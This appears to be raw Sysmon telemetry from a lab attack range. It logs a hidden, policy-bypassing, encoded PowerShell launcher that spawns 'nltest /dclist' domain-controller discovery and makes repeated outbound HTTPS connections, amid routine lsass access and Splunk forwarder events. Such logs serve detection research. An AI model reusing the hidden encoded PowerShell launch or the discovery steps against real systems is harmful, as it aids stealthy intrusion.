18:14:50.514{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.514{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ADAE218267B6564904629FD0EF1CDED,SHA256=A839C0086BB1FB10DD2F120908AC8A6AC8AF91DA4898E8F33EDAE9362638A93D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:01.487{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52FB4C40277BC1506C01DE39B4913FA7,SHA256=E72526952C683F1990FA0944F21B4DF06A309A05D1FC097EB3F0F6E186E1508E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:02.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E781B3B0B0476ECD6335223BC8633E0,SHA256=2D63FBD4FACC0FCE1ED327C5D074AA7B3588E52EDEBC045E124B419C14F6FC1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:26.077{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56708-false10.0.1.12-8000- 23542300x800000000000000035085232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:03.538{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B36830BC89B890EB04E4EC12AAA64BB2,SHA256=47029A87D3F53C0A69A68C3E6CBF58505F0E6CAAC60CC7BDF44EBAAAA29A2001,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.553{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90FF0FEDB2244C8572F0B1093D0BEB47,SHA256=9A4D87E0E178C1D2C14E11F1372DB580FB10DEC224DFD46D4E25B43F1D72C33E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DEDF54AAB5B0AF1BD62E6519F15D58F4,SHA256=B7DA4ECD36C7BB82EBF9115F4C2B32AC454401CE2CDA370312C327B8CED6A2B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:05.583{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=191060ACB75F4689A2B2990BD06F4DE6,SHA256=A3A7DEBDB9C4FD69497CB3BC092F265A35E3F94428091BED4C2480F352A30121,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035085235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:29.261{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56709-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:06.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2729B1611B23317F445800C306EA73D,SHA256=A35EEC770B93AC60D2B1F5A4F17EC878BAD729A367B9979A783728620A19CD08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAEA376083F12BC0647516C76FBAF13,SHA256=1F570078C8B8CD745120029CC9278DB2595C5EB0B832E948C4FC8431534DCCB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:31.159{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56710-false10.0.1.12-8000- 734700x800000000000000035085248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:07.418{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\System32\nltest.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035085247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.418{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:07.418{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.281{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:07.266{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll
+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.272{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\System32\nltest.exe10.0.14393.4283 (rs1_release.210303-1802)Microsoft® Logon Server Test UtilityMicrosoft® Windows® 
Operating SystemMicrosoft Corporationnltestrk.exe"C:\Windows\system32\nltest.exe" /dclist:C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=1171BC1F016201B83E30634121BA2A40,SHA256=8DB95007AC3DD96C487C0CC477BD89A6282D6F0949EBCECBBDA4F8D37C2A959C,IMPHASH=4C049D80BB0FE7E8B0688666FFF88442{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e 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 23542300x800000000000000035085256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B271D3AD4580DC8DE917B7E77C0EC2,SHA256=460000AD6CDE309D5926F80A2AD9999B3E0B63A9811FD8A59BAFE6A15DCDEDA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.320{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local51097-false10.0.1.14WIN-DC-128389- 354300x800000000000000035085254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.274{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56711-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9295017DD30BC06A1C3664A35146EF97,SHA256=D6355494B9112B5B80895CF65A0CACF8B324E881FA5B276E439B2F42C77CE76E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67737AB8F8A56DD63A754C3B4AF7241C,SHA256=3DA28988D74FBF438FA7B63A1F75DE266D2DE3B3598899FDCA935E9359991C38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=297388D1E924568213DD35605EEB84D7,SHA256=939595F8E1A067A652DBF6EDBE2C8F540F7E04ABA70CDCBE2D9BCE64461322E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:09.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CD5EDFBA1477740B426355EF6F8E4D0,SHA256=EB53A3CC238F11CED27CD4A90A597318CD00E9591CA726EE2D8C811B81492C69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.444{00000000-0000-0000-0000-000000000000}6048<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56712-false10.0.1.14WIN-DC-128135epmap 22542200x800000000000000035085257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.443{00000000-0000-0000-0000-000000000000}6048win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035085272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.735{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A794BF97145CCE1EBA575CF38E170BB,SHA256=2BEE722242E53E066FF42C1FB8CE74031EF99051DA8357F59747010556F2858C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.669{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56714-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035085270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.448{00000000-0000-0000-0000-000000000000}6048<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56713-false10.0.1.14WIN-DC-12849666- 13241300x800000000000000035085269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 
13241300x800000000000000035085268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x71837ade) 13241300x800000000000000035085267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59e-0x3e111205) 13241300x800000000000000035085266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD 